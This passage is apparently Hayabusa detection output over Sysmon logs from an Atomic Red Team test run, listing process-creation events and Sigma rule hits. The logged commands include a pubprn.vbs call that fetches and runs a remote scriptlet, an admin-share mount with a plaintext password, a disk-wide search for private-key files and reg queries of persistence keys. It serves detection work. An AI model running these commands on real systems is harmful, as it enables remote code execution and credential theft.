MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private 
Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: 
C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
